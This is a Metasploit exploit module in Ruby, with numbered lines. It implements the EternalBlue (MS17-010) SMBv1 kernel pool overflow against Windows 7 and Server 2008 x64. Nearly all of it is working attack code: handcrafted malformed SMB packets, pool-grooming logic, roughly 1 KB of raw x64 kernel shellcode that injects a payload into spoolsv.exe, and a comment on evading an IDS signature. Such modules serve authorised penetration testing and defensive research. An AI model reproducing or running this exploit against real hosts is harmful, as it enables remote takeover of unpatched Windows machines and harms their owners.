### This module requires Metasploit: http://metasploit.com/download# Current

1. ##
2. # This module requires Metasploit: http://metasploit.com/download
3. # Current source: https://github.com/rapid7/metasploit-framework
4. ##
5.  
6. require 'ruby_smb'
7. require 'ruby_smb/smb1/packet'
8.  
9. class MetasploitModule < Msf::Exploit::Remote
10. Rank = GreatRanking
11.  
12. include Msf::Exploit::Remote::Tcp
13.  
14. def initialize(info = {})
15. super(update_info(info,
16. 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
17. 'Description' => %q{
18. This module is a port of the Equation Group ETERNALBLUE exploit, part of
19. the FuzzBunch toolkit released by Shadow Brokers.
20. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size
21. is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a
22. DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow
23. is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later
24. completed in srvnet!SrvNetWskReceiveComplete.
25. This exploit, like the original may not trigger 100% of the time, and should be
26. run continuously until triggered. It seems like the pool will get hot streaks
27. and need a cool down period before the shells rain in again.
28. },
29.  
30. 'Author' => [
31. 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
32. 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
33. 'Equation Group',
34. 'Shadow Brokers'
35. ],
36. 'License' => MSF_LICENSE,
37. 'References' =>
38. [
39. [ 'MSB', 'MS17-010' ],
40. [ 'CVE', '2017-0143' ],
41. [ 'CVE', '2017-0144' ],
42. [ 'CVE', '2017-0145' ],
43. [ 'CVE', '2017-0146' ],
44. [ 'CVE', '2017-0147' ],
45. [ 'CVE', '2017-0148' ],
46. [ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ]
47. ],
48. 'DefaultOptions' =>
49. {
50. 'EXITFUNC' => 'thread',
51. },
52. 'Privileged' => true,
53. 'Payload' =>
54. {
55. 'Space' => 2000, # this can be more, needs to be recalculated
56. 'EncoderType' => Msf::Encoder::Type::Raw,
57. },
58. 'Platform' => 'win',
59. 'Targets' =>
60. [
61. [ 'Windows 7 and Server 2008 (x64) All Service Packs',
62. {
63. 'Platform' => 'win',
64. 'Arch' => [ ARCH_X64 ],
65.  
66. 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
67. 'et_alertable' => 0x4c, # ETHREAD.Alertable offset
68. 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
69. 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
70. }
71. ],
72. ],
73. 'DefaultTarget' => 0,
74. 'DisclosureDate' => 'Mar 14 2017'
75. ))
76.  
77. register_options(
78. [
79. Opt::RPORT(445),
80. OptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]),
81. OptInt.new( 'MaxExploitAttempts', [ true, "The number of times to retry the exploit.", 3 ] ),
82. OptInt.new( 'GroomAllocations', [ true, "Initial number of times to groom the kernel pool.", 12 ] ),
83. OptInt.new( 'GroomDelta', [ true, "The amount to increase the groom count by per try.", 5 ] )
84. ])
85. end
86.  
87. def check
88. # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010
89. end
90.  
91. def exploit
92. begin
93. for i in 1..datastore['MaxExploitAttempts']
94.  
95. grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
96.  
97. smb_eternalblue(datastore['ProcessName'], grooms)
98.  
99. # we don't need this sleep, and need to find a way to remove it
100. # problem is session_count won't increment until stage is complete :\
101. secs = 0
102. while !session_created? and secs < 5
103. secs += 1
104. sleep 1
105. end
106.  
107. if session_created?
108. print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
109. print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
110. print_good("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
111. break
112. else
113. print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
114. print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
115. print_bad("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=")
116. end
117. end
118.  
119. rescue ::RubySMB::Error::UnexpectedStatusCode,
120. ::Errno::ECONNRESET,
121. ::Rex::HostUnreachable,
122. ::Rex::ConnectionTimeout,
123. ::Rex::ConnectionRefused => e
124. print_bad("#{e.class}: #{e.message}")
125. rescue => error
126. print_bad(error.class)
127. print_bad(error.message)
128. print_bad(error.backtrace)
129. ensure
130. # pass
131. end
132. end
133.  
134. #
135. # Increase the default delay by five seconds since some kernel-mode
136. # payloads may not run immediately.
137. #
138. def wfs_delay
139. super + 5
140. end
141.  
142. def smb_eternalblue(process_name, grooms)
143. begin
144. # Step 0: pre-calculate what we can
145. shellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0)
146. payload_hdr_pkt = make_smb2_payload_headers_packet
147. payload_body_pkt = make_smb2_payload_body_packet(shellcode)
148.  
149. # Step 1: Connect to IPC$ share
150. print_status("Connecting to target for exploitation.")
151. client, tree, sock = smb1_anonymous_connect_ipc()
152. print_good("Connection established for exploitation.")
153.  
154. print_status("Trying exploit with #{grooms} Groom Allocations.")
155.  
156. # Step 2: Create a large SMB1 buffer
157. print_status("Sending all but last fragment of exploit packet")
158. smb1_large_buffer(client, tree, sock)
159.  
160. # Step 3: Groom the pool with payload packets, and open/close SMB1 packets
161. print_status("Starting non-paged pool grooming")
162.  
163. # initialize_groom_threads(ip, port, payload, grooms)
164. fhs_sock = smb1_free_hole(true)
165.  
166. @groom_socks = []
167.  
168. print_good("Sending SMBv2 buffers")
169. smb2_grooms(grooms, payload_hdr_pkt)
170.  
171. fhf_sock = smb1_free_hole(false)
172.  
173. print_good("Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.")
174. fhs_sock.shutdown()
175.  
176. print_status("Sending final SMBv2 buffers.") # 6x
177. smb2_grooms(6, payload_hdr_pkt) # todo: magic #
178.  
179. fhf_sock.shutdown()
180.  
181. print_status("Sending last fragment of exploit packet!")
182. final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)
183. sock.put(final_exploit_pkt)
184.  
185. print_status("Receiving response from exploit packet")
186. code, raw = smb1_get_response(sock)
187.  
188. if code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D)
189. print_good("ETERNALBLUE overwrite completed successfully (0xC000000D)!")
190. end
191.  
192. # Step 4: Send the payload
193. print_status("Sending egg to corrupted connection.")
194.  
195. @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }
196. @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }
197.  
198. print_status("Triggering free of corrupted buffer.")
199. # tree disconnect
200. # logoff and x
201. # note: these aren't necessary, just close the sockets
202.  
203. ensure
204. abort_sockets
205. end
206. end
207.  
208. def smb2_grooms(grooms, payload_hdr_pkt)
209. grooms.times do |groom_id|
210. gsock = connect(false)
211. @groom_socks << gsock
212. gsock.put(payload_hdr_pkt)
213. end
214. end
215.  
216. def smb1_anonymous_connect_ipc()
217. sock = connect(false)
218. dispatcher = RubySMB::Dispatcher::Socket.new(sock)
219. client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
220. client.negotiate
221.  
222. pkt = make_smb1_anonymous_login_packet
223. sock.put(pkt)
224.  
225. code, raw, response = smb1_get_response(sock)
226.  
227. unless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS
228. raise RubySMB::Error::UnexpectedStatusCode, "Error with anonymous login"
229. end
230.  
231. client.user_id = response.uid
232.  
233. tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")
234.  
235. return client, tree, sock
236. end
237.  
238. def smb1_large_buffer(client, tree, sock)
239. nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)
240.  
241. # send NT Trans
242. vprint_status("Sending NT Trans Request packet")
243. sock.put(nt_trans_pkt)
244.  
245. vprint_status("Receiving NT Trans packet")
246. raw = sock.get_once
247.  
248. # Initial Trans2 request
249. trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)
250.  
251. # send all but last packet
252. for i in 1..14
253. trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)
254. end
255.  
256. trans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id)
257.  
258. vprint_status("Sending malformed Trans2 packets")
259. sock.put(trans2_pkt_nulled)
260.  
261. sock.get_once
262. end
263.  
264. def smb1_free_hole(start)
265. sock = connect(false)
266. dispatcher = RubySMB::Dispatcher::Socket.new(sock)
267. client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
268. client.negotiate
269.  
270. pkt = ""
271.  
272. if start
273. vprint_status("Sending start free hole packet.")
274. pkt = make_smb1_free_hole_session_packet("\x07\xc0", "\x2d\x01", "\xf0\xff\x00\x00\x00")
275. else
276. vprint_status("Sending end free hole packet.")
277. pkt = make_smb1_free_hole_session_packet("\x07\x40", "\x2c\x01", "\xf8\x87\x00\x00\x00")
278. end
279.  
280. #dump_packet(pkt)
281. sock.put(pkt)
282.  
283. vprint_status("Receiving free hole response.")
284. sock.get_once
285.  
286. return sock
287. end
288.  
289. def smb1_get_response(sock)
290. raw = sock.get_once
291. response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])
292. code = response.nt_status
293. return code, raw, response
294. end
295.  
296. def make_smb2_payload_headers_packet
297. # don't need a library here, the packet is essentially nonsensical
298. pkt = ""
299. pkt << "\x00" # session message
300. pkt << "\x00\xff\xf7" # size
301. pkt << "\xfeSMB" # SMB2
302. pkt << "\x00" * 124
303.  
304. pkt
305. end
306.  
307. def make_smb2_payload_body_packet(kernel_user_payload)
308. # precalculated lengths
309. pkt_max_len = 4204
310. pkt_setup_len = 497
311. pkt_max_payload = pkt_max_len - pkt_setup_len # 3575
312.  
313. # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode
314. pkt = ""
315.  
316. # padding
317. pkt << "\x00" * 0x8
318. pkt << "\x03\x00\x00\x00"
319. pkt << "\x00" * 0x1c
320. pkt << "\x03\x00\x00\x00"
321. pkt << "\x00" * 0x74
322.  
323. # KI_USER_SHARED_DATA addresses
324. pkt << "\xb0\x00\xd0\xff\xff\xff\xff\xff" * 2 # x64 address
325. pkt << "\x00" * 0x10
326. pkt << "\xc0\xf0\xdf\xff" * 2 # x86 address
327. pkt << "\x00" * 0xc4
328.  
329. # payload addreses
330. pkt << "\x90\xf1\xdf\xff"
331. pkt << "\x00" * 0x4
332. pkt << "\xf0\xf1\xdf\xff"
333. pkt << "\x00" * 0x40
334.  
335. pkt << "\xf0\x01\xd0\xff\xff\xff\xff\xff"
336. pkt << "\x00" * 0x8
337. pkt << "\x00\x02\xd0\xff\xff\xff\xff\xff"
338. pkt << "\x00"
339.  
340. pkt << kernel_user_payload
341.  
342. # fill out the rest, this can be randomly generated
343. pkt << "\x00" * (pkt_max_payload - kernel_user_payload.length)
344.  
345. pkt
346. end
347.  
348. def make_smb1_echo_packet(tree_id, user_id)
349. pkt = ""
350. pkt << "\x00" # type
351. pkt << "\x00\x00\x31" # len = 49
352. pkt << "\xffSMB" # SMB1
353. pkt << "\x2b" # Echo
354. pkt << "\x00\x00\x00\x00" # Success
355. pkt << "\x18" # flags
356. pkt << "\x07\xc0" # flags2
357. pkt << "\x00\x00" # PID High
358. pkt << "\x00\x00\x00\x00" # Signature1
359. pkt << "\x00\x00\x00\x00" # Signature2
360. pkt << "\x00\x00" # Reserved
361. pkt << [tree_id].pack("S>") # Tree ID
362. pkt << "\xff\xfe" # PID
363. pkt << [user_id].pack("S>") # UserID
364. pkt << "\x40\x00" # MultiplexIDs
365.  
366. pkt << "\x01" # Word count
367. pkt << "\x01\x00" # Echo count
368. pkt << "\x0c\x00" # Byte count
369.  
370. # echo data
371. # this is an existing IDS signature, and can be nulled out
372. #pkt << "\x4a\x6c\x4a\x6d\x49\x68\x43\x6c\x42\x73\x72\x00"
373. pkt << "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00"
374.  
375. pkt
376. end
377.  
378. # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit
379. def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)
380. timeout = (timeout * 0x10) + 3
381.  
382. pkt = ""
383. pkt << "\x00" # Session message
384. pkt << "\x00\x10\x35" # length
385. pkt << "\xffSMB" # SMB1
386. pkt << "\x33" # Trans2 request
387. pkt << "\x00\x00\x00\x00" # NT SUCCESS
388. pkt << "\x18" # Flags
389. pkt << "\x07\xc0" # Flags2
390. pkt << "\x00\x00" # PID High
391. pkt << "\x00\x00\x00\x00" # Signature1
392. pkt << "\x00\x00\x00\x00" # Signature2
393. pkt << "\x00\x00" # Reserved
394. pkt << [tree_id].pack("S>") # TreeID
395. pkt << "\xff\xfe" # PID
396. pkt << [user_id].pack("S>") # UserID
397. pkt << "\x40\x00" # MultiplexIDs
398.  
399. pkt << "\x09" # Word Count
400. pkt << "\x00\x00" # Total Param Count
401. pkt << "\x00\x10" # Total Data Count
402. pkt << "\x00\x00" # Max Param Count
403. pkt << "\x00\x00" # Max Data Count
404. pkt << "\x00" # Max Setup Count
405. pkt << "\x00" # Reserved
406. pkt << "\x00\x10" # Flags
407. pkt << "\x35\x00\xd0" # Timeouts
408. pkt << timeout.chr
409. pkt << "\x00\x00" # Reserved
410. pkt << "\x00\x10" # Parameter Count
411.  
412. #pkt << "\x74\x70" # Parameter Offset
413. #pkt << "\x47\x46" # Data Count
414. #pkt << "\x45\x6f" # Data Offset
415. #pkt << "\x4c" # Setup Count
416. #pkt << "\x4f" # Reserved
417.  
418. if type == :eb_trans2_exploit
419. vprint_status("Making :eb_trans2_exploit packet")
420.  
421. pkt << "\x41" * 2957
422.  
423. pkt << "\x80\x00\xa8\x00" # overflow
424.  
425. pkt << "\x00" * 0x10
426. pkt << "\xff\xff"
427. pkt << "\x00" * 0x6
428. pkt << "\xff\xff"
429. pkt << "\x00" * 0x16
430.  
431. pkt << "\x00\xf1\xdf\xff" # x86 addresses
432. pkt << "\x00" * 0x8
433. pkt << "\x20\xf0\xdf\xff"
434.  
435. pkt << "\x00\xf1\xdf\xff\xff\xff\xff\xff" # x64
436.  
437. pkt << "\x60\x00\x04\x10"
438. pkt << "\x00" * 4
439.  
440. pkt << "\x80\xef\xdf\xff"
441.  
442. pkt << "\x00" * 4
443. pkt << "\x10\x00\xd0\xff\xff\xff\xff\xff"
444. pkt << "\x18\x01\xd0\xff\xff\xff\xff\xff"
445. pkt << "\x00" * 0x10
446.  
447. pkt << "\x60\x00\x04\x10"
448. pkt << "\x00" * 0xc
449. pkt << "\x90\xff\xcf\xff\xff\xff\xff\xff"
450. pkt << "\x00" * 0x8
451. pkt << "\x80\x10"
452. pkt << "\x00" * 0xe
453. pkt << "\x39"
454. pkt << "\xbb"
455.  
456. pkt << "\x41" * 965
457.  
458. return pkt
459. end
460.  
461. if type == :eb_trans2_zero
462. vprint_status("Making :eb_trans2_zero packet")
463. pkt << "\x00" * 2055
464. pkt << "\x83\xf3"
465. pkt << "\x41" * 2039
466. #pkt << "\x00" * 4096
467. else
468. vprint_status("Making :eb_trans2_buffer packet")
469. pkt << "\x41" * 4096
470. end
471.  
472. pkt
473.  
474. end
475.  
476. def make_smb1_nt_trans_packet(tree_id, user_id)
477. pkt = ""
478. pkt << "\x00" # Session message
479. pkt << "\x00\x04\x38" # length
480. pkt << "\xffSMB" # SMB1
481. pkt << "\xa0" # NT Trans
482. pkt << "\x00\x00\x00\x00" # NT SUCCESS
483. pkt << "\x18" # Flags
484. pkt << "\x07\xc0" # Flags2
485. pkt << "\x00\x00" # PID High
486. pkt << "\x00\x00\x00\x00" # Signature1
487. pkt << "\x00\x00\x00\x00" # Signature2
488. pkt << "\x00\x00" # Reserved
489. pkt << [tree_id].pack("S>") # TreeID
490. pkt << "\xff\xfe" # PID
491. pkt << [user_id].pack("S>") # UserID
492. pkt << "\x40\x00" # MultiplexID
493.  
494. pkt << "\x14" # Word Count
495. pkt << "\x01" # Max Setup Count
496. pkt << "\x00\x00" # Reserved
497. pkt << "\x1e\x00\x00\x00" # Total Param Count
498. pkt << "\xd0\x03\x01\x00" # Total Data Count
499. pkt << "\x1e\x00\x00\x00" # Max Param Count
500. pkt << "\x00\x00\x00\x00" # Max Data Count
501. pkt << "\x1e\x00\x00\x00" # Param Count
502. pkt << "\x4b\x00\x00\x00" # Param Offset
503. pkt << "\xd0\x03\x00\x00" # Data Count
504. pkt << "\x68\x00\x00\x00" # Data Offset
505. pkt << "\x01" # Setup Count
506. pkt << "\x00\x00" # Function <unknown>
507. pkt << "\x00\x00" # Unknown NT transaction (0) setup
508. pkt << "\xec\x03" # Byte Count
509. pkt << "\x00" * 0x1f # NT Parameters
510.  
511. # undocumented
512. pkt << "\x01"
513. pkt << "\x00" * 0x3cd
514.  
515. pkt
516. end
517.  
518. def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)
519. pkt = ""
520. pkt << "\x00" # Session message
521. pkt << "\x00\x00\x51" # length
522. pkt << "\xffSMB" # SMB1
523. pkt << "\x73" # Session Setup AndX
524. pkt << "\x00\x00\x00\x00" # NT SUCCESS
525. pkt << "\x18" # Flags
526. pkt << flags2 # Flags2
527. pkt << "\x00\x00" # PID High
528. pkt << "\x00\x00\x00\x00" # Signature1
529. pkt << "\x00\x00\x00\x00" # Signature2
530. pkt << "\x00\x00" # Reserved
531. pkt << "\x00\x00" # TreeID
532. pkt << "\xff\xfe" # PID
533. pkt << "\x00\x00" # UserID
534. pkt << "\x40\x00" # MultiplexID
535. #pkt << "\x00\x00" # Reserved
536.  
537. pkt << "\x0c" # Word Count
538. pkt << "\xff" # No further commands
539. pkt << "\x00" # Reserved
540. pkt << "\x00\x00" # AndXOffset
541. pkt << "\x04\x11" # Max Buffer
542. pkt << "\x0a\x00" # Max Mpx Count
543. pkt << vcnum # VC Number
544. pkt << "\x00\x00\x00\x00" # Session key
545. pkt << "\x00\x00" # Security blob length
546. pkt << "\x00\x00\x00\x00" # Reserved
547. pkt << "\x00\x00\x00\x80" # Capabilities
548. pkt << "\x16\x00" # Byte count
549. #pkt << "\xf0" # Security Blob: <MISSING>
550. #pkt << "\xff\x00\x00\x00" # Native OS
551. #pkt << "\x00\x00" # Native LAN manager
552. #pkt << "\x00\x00" # Primary domain
553. pkt << native_os
554. pkt << "\x00" * 17 # Extra byte params
555.  
556. pkt
557. end
558.  
559. def make_smb1_anonymous_login_packet
560. # Neither Rex nor RubySMB appear to support Anon login?
561. pkt = ""
562. pkt << "\x00" # Session message
563. pkt << "\x00\x00\x88" # length
564. pkt << "\xffSMB" # SMB1
565. pkt << "\x73" # Session Setup AndX
566. pkt << "\x00\x00\x00\x00" # NT SUCCESS
567. pkt << "\x18" # Flags
568. pkt << "\x07\xc0" # Flags2
569. pkt << "\x00\x00" # PID High
570. pkt << "\x00\x00\x00\x00" # Signature1
571. pkt << "\x00\x00\x00\x00" # Signature2
572. pkt << "\x00\x00" # TreeID
573. pkt << "\xff\xfe" # PID
574. pkt << "\x00\x00" # Reserved
575. pkt << "\x00\x00" # UserID
576. pkt << "\x40\x00" # MultiplexID
577.  
578. pkt << "\x0d" # Word Count
579. pkt << "\xff" # No further commands
580. pkt << "\x00" # Reserved
581. pkt << "\x88\x00" # AndXOffset
582. pkt << "\x04\x11" # Max Buffer
583. pkt << "\x0a\x00" # Max Mpx Count
584. pkt << "\x00\x00" # VC Number
585. pkt << "\x00\x00\x00\x00" # Session key
586. pkt << "\x01\x00" # ANSI pw length
587. pkt << "\x00\x00" # Unicode pw length
588. pkt << "\x00\x00\x00\x00" # Reserved
589. pkt << "\xd4\x00\x00\x00" # Capabilities
590. pkt << "\x4b\x00" # Byte count
591. pkt << "\x00" # ANSI pw
592. pkt << "\x00\x00" # Account name
593. pkt << "\x00\x00" # Domain name
594.  
595. # Windows 2000 2195
596. pkt << "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
597. pkt << "\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00"
598. pkt << "\x00\x00"
599.  
600. # Windows 2000 5.0
601. pkt << "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32"
602. pkt << "\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00\x30\x00\x00\x00"
603.  
604. pkt
605. end
606.  
607. # ring3 = user mode encoded payload
608. # proc_name = process to inject APC into
609. # ep_thl_b = EPROCESS.ThreadListHead.Blink offset
610. # et_alertable = ETHREAD.Alertable offset
611. # teb_acp = TEB.ActivationContextPointer offset
612. # et_tle = ETHREAD.ThreadListEntry offset
613. def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)
614. sc = make_kernel_shellcode
615. sc << [ring3.length].pack("S<")
616. sc << ring3
617. sc
618. end
619.  
620. def make_kernel_shellcode
621. # https://github.com/RiskSense-Ops/MS17-010/blob/master/payloads/x64/src/exploit/kernel.asm
622. # Name: kernel
623. # Length: 1019 bytes
624.  
625. #"\xcc"+
626. "\xB9\x82\x00\x00\xC0\x0F\x32\x48\xBB\xF8\x0F\xD0\xFF\xFF\xFF\xFF" +
627. "\xFF\x89\x53\x04\x89\x03\x48\x8D\x05\x0A\x00\x00\x00\x48\x89\xC2" +
628. "\x48\xC1\xEA\x20\x0F\x30\xC3\x0F\x01\xF8\x65\x48\x89\x24\x25\x10" +
629. "\x00\x00\x00\x65\x48\x8B\x24\x25\xA8\x01\x00\x00\x50\x53\x51\x52" +
630. "\x56\x57\x55\x41\x50\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41" +
631. "\x56\x41\x57\x6A\x2B\x65\xFF\x34\x25\x10\x00\x00\x00\x41\x53\x6A" +
632. "\x33\x51\x4C\x89\xD1\x48\x83\xEC\x08\x55\x48\x81\xEC\x58\x01\x00" +
633. "\x00\x48\x8D\xAC\x24\x80\x00\x00\x00\x48\x89\x9D\xC0\x00\x00\x00" +
634. "\x48\x89\xBD\xC8\x00\x00\x00\x48\x89\xB5\xD0\x00\x00\x00\x48\xA1" +
635. "\xF8\x0F\xD0\xFF\xFF\xFF\xFF\xFF\x48\x89\xC2\x48\xC1\xEA\x20\x48" +
636. "\x31\xDB\xFF\xCB\x48\x21\xD8\xB9\x82\x00\x00\xC0\x0F\x30\xFB\xE8" +
637. "\x38\x00\x00\x00\xFA\x65\x48\x8B\x24\x25\xA8\x01\x00\x00\x48\x83" +
638. "\xEC\x78\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x41\x5B\x41\x5A\x41\x59" +
639. "\x41\x58\x5D\x5F\x5E\x5A\x59\x5B\x58\x65\x48\x8B\x24\x25\x10\x00" +
640. "\x00\x00\x0F\x01\xF8\xFF\x24\x25\xF8\x0F\xD0\xFF\x56\x41\x57\x41" +
641. "\x56\x41\x55\x41\x54\x53\x55\x48\x89\xE5\x66\x83\xE4\xF0\x48\x83" +
642. "\xEC\x20\x4C\x8D\x35\xE3\xFF\xFF\xFF\x65\x4C\x8B\x3C\x25\x38\x00" +
643. "\x00\x00\x4D\x8B\x7F\x04\x49\xC1\xEF\x0C\x49\xC1\xE7\x0C\x49\x81" +
644. "\xEF\x00\x10\x00\x00\x49\x8B\x37\x66\x81\xFE\x4D\x5A\x75\xEF\x41" +
645. "\xBB\x5C\x72\x11\x62\xE8\x18\x02\x00\x00\x48\x89\xC6\x48\x81\xC6" +
646. "\x08\x03\x00\x00\x41\xBB\x7A\xBA\xA3\x30\xE8\x03\x02\x00\x00\x48" +
647. "\x89\xF1\x48\x39\xF0\x77\x11\x48\x8D\x90\x00\x05\x00\x00\x48\x39" +
648. "\xF2\x72\x05\x48\x29\xC6\xEB\x08\x48\x8B\x36\x48\x39\xCE\x75\xE2" +
649. "\x49\x89\xF4\x31\xDB\x89\xD9\x83\xC1\x04\x81\xF9\x00\x00\x01\x00" +
650. "\x0F\x8D\x66\x01\x00\x00\x4C\x89\xF2\x89\xCB\x41\xBB\x66\x55\xA2" +
651. "\x4B\xE8\xBC\x01\x00\x00\x85\xC0\x75\xDB\x49\x8B\x0E\x41\xBB\xA3" +
652. "\x6F\x72\x2D\xE8\xAA\x01\x00\x00\x48\x89\xC6\xE8\x50\x01\x00\x00" +
653. "\x41\x81\xF9\xBF\x77\x1F\xDD\x75\xBC\x49\x8B\x1E\x4D\x8D\x6E\x10" +
654. "\x4C\x89\xEA\x48\x89\xD9\x41\xBB\xE5\x24\x11\xDC\xE8\x81\x01\x00" +
655. "\x00\x6A\x40\x68\x00\x10\x00\x00\x4D\x8D\x4E\x08\x49\xC7\x01\x00" +
656. "\x10\x00\x00\x4D\x31\xC0\x4C\x89\xF2\x31\xC9\x48\x89\x0A\x48\xF7" +
657. "\xD1\x41\xBB\x4B\xCA\x0A\xEE\x48\x83\xEC\x20\xE8\x52\x01\x00\x00" +
658. "\x85\xC0\x0F\x85\xC8\x00\x00\x00\x49\x8B\x3E\x48\x8D\x35\xE9\x00" +
659. "\x00\x00\x31\xC9\x66\x03\x0D\xD7\x01\x00\x00\x66\x81\xC1\xF9\x00" +
660. "\xF3\xA4\x48\x89\xDE\x48\x81\xC6\x08\x03\x00\x00\x48\x89\xF1\x48" +
661. "\x8B\x11\x4C\x29\xE2\x51\x52\x48\x89\xD1\x48\x83\xEC\x20\x41\xBB" +
662. "\x26\x40\x36\x9D\xE8\x09\x01\x00\x00\x48\x83\xC4\x20\x5A\x59\x48" +
663. "\x85\xC0\x74\x18\x48\x8B\x80\xC8\x02\x00\x00\x48\x85\xC0\x74\x0C" +
664. "\x48\x83\xC2\x4C\x8B\x02\x0F\xBA\xE0\x05\x72\x05\x48\x8B\x09\xEB" +
665. "\xBE\x48\x83\xEA\x4C\x49\x89\xD4\x31\xD2\x80\xC2\x90\x31\xC9\x41" +
666. "\xBB\x26\xAC\x50\x91\xE8\xC8\x00\x00\x00\x48\x89\xC1\x4C\x8D\x89" +
667. "\x80\x00\x00\x00\x41\xC6\x01\xC3\x4C\x89\xE2\x49\x89\xC4\x4D\x31" +
668. "\xC0\x41\x50\x6A\x01\x49\x8B\x06\x50\x41\x50\x48\x83\xEC\x20\x41" +
669. "\xBB\xAC\xCE\x55\x4B\xE8\x98\x00\x00\x00\x31\xD2\x52\x52\x41\x58" +
670. "\x41\x59\x4C\x89\xE1\x41\xBB\x18\x38\x09\x9E\xE8\x82\x00\x00\x00" +
671. "\x4C\x89\xE9\x41\xBB\x22\xB7\xB3\x7D\xE8\x74\x00\x00\x00\x48\x89" +
672. "\xD9\x41\xBB\x0D\xE2\x4D\x85\xE8\x66\x00\x00\x00\x48\x89\xEC\x5D" +
673. "\x5B\x41\x5C\x41\x5D\x41\x5E\x41\x5F\x5E\xC3\xE9\xB5\x00\x00\x00" +
674. "\x4D\x31\xC9\x31\xC0\xAC\x41\xC1\xC9\x0D\x3C\x61\x7C\x02\x2C\x20" +
675. "\x41\x01\xC1\x38\xE0\x75\xEC\xC3\x31\xD2\x65\x48\x8B\x52\x60\x48" +
676. "\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x12\x48\x8B\x72\x50\x48\x0F" +
677. "\xB7\x4A\x4A\x45\x31\xC9\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\x41" +
678. "\xC1\xC9\x0D\x41\x01\xC1\xE2\xEE\x45\x39\xD9\x75\xDA\x4C\x8B\x7A" +
679. "\x20\xC3\x4C\x89\xF8\x41\x51\x41\x50\x52\x51\x56\x48\x89\xC2\x8B" +
680. "\x42\x3C\x48\x01\xD0\x8B\x80\x88\x00\x00\x00\x48\x01\xD0\x50\x8B" +
681. "\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\x48\xFF\xC9\x41\x8B\x34\x88" +
682. "\x48\x01\xD6\xE8\x78\xFF\xFF\xFF\x45\x39\xD9\x75\xEC\x58\x44\x8B" +
683. "\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01" +
684. "\xD0\x41\x8B\x04\x88\x48\x01\xD0\x5E\x59\x5A\x41\x58\x41\x59\x41" +
685. "\x5B\x41\x53\xFF\xE0\x56\x41\x57\x55\x48\x89\xE5\x48\x83\xEC\x20" +
686. "\x41\xBB\xDA\x16\xAF\x92\xE8\x4D\xFF\xFF\xFF\x31\xC9\x51\x51\x51" +
687. "\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00\x5A\x48\x83\xEC\x20\x41" +
688. "\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF\x48\x89\xEC\x5D\x41\x5F" +
689. "\x5E\xC3"
690. end
691.  
692. end